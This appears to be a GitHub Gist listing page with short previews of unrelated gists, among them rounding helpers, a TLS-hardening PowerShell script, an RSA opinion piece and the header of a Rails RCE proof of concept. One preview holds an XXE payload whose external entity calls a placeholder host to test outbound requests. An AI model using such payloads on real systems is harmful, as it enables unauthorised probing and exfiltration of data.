We have moved: https://github.com/magnetikonline/linuxmicrosoftievirtualmachines
Due to the popularity of this Gist, and the work in keeping it updated via a Gist, all future updates will take place at the above location. Thanks!
Erlend Oftedal eoftedal
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** round n down to nearest multiple of m */ | |
| long roundDown(long n, long m) { | |
| return n >= 0 ? (n / m) * m : ((n - m + 1) / m) * m; | |
| } | |
| /** round n up to nearest multiple of m */ | |
| long roundUp(long n, long m) { | |
| return n >= 0 ? ((n + m - 1) / m) * m : (n / m) * m; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * Enable route to __noSuchMethod__ when unknown method calling. | |
| * | |
| * @param {Object} obj Target object. | |
| * @return {Object} | |
| */ | |
| function enableMethodMissing(obj) { | |
| var functionHandler = createBaseHandler({}); | |
| functionHandler.get = function(receiver, name) { |
postmodern
/ rails_rce.rb
Last active
July 17, 2023 11:54
Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # | |
| # Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156) | |
| # | |
| # ## Advisory | |
| # | |
| # https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion | |
| # | |
| # ## Caveats | |
| # |
magnetikonline
/ README.md
Last active
March 14, 2024 22:48
IE 7/8/9/10/11 Virtual machines from Microsoft - Linux w/VirtualBox installation notes.
I want to be extremely clear about three things. First, this is my personal opinion – insert full standard disclaimer. Second, this is not a condemnation of everyone at RSA, present and past. I assume most of them are pretty okay, and that the problem is confined to a few specific points in the company. However, “unknown problem people making major decisions at RSA” is a bit unwieldy, so I will just say RSA. Third, I'm not calling for a total boycott on RSA. I work almost literally across the street from them and I don’t want to get beat up by roving gangs of cryptographers at the local Chipotle.
RSA's denial published last night is utter codswallop that denies pretty much everything in the world except the actual allegations put forth by Reuters and hinted at for months by [other sources](http://li
A list of the most common functionalities in Jekyll (Liquid). You can use Jekyll with GitHub Pages, just make sure you are using the proper version.
Running a local server for testing purposes:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
molnarg
/ angularjs-sandbox-escape.md
Last active
August 3, 2017 08:46
An AngularJS Template Expression Sandbox Escape
jesusprubio
/ gist:8f092af4ca252e252eab
Last active
April 12, 2023 15:02
Proposal: A Node.js penetration test framework
Hi guys! Since I started to write Bluebox-ng I've been tracking the different security projects I found written in Node.js. Now we've published the first stable version we think it's the right moment to speak among us (and, of course, everyone interested in it :).
- I think we're rewriting the same stuff in our respective projects again and again. For example, almost any tool supports IPv6 because the functions we need are still not present in the Node core and the libraries I found (IMHO) were not enough.
- There're different projects implementing exactly the same thing, ie: port scanners.
- We're working in a too new environment, so we need to make it together.
SidShetye
/ HardenSSL.ps1
Last active
August 14, 2023 14:59
Script to harden SSL/TLS on Azure Cloud Service
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Call this from inside a startup task/batch file as shown in the next two lines (minus the '# ') | |
| # PowerShell -ExecutionPolicy Unrestricted .\HardenSsl.ps1 >> log-HardenSsl.txt 2>&1 | |
| # EXIT /B 0 | |
| # Credits: | |
| # http://azure.microsoft.com/blog/2014/10/19/how-to-disable-ssl-3-0-in-azure-websites-roles-and-virtual-machines/ | |
| # http://lukieb.blogspot.com/2014/11/tightening-up-your-azure-cloud-service.html | |
| $nl = [Environment]::NewLine | |
| $regkeys = @( |
OlderNewer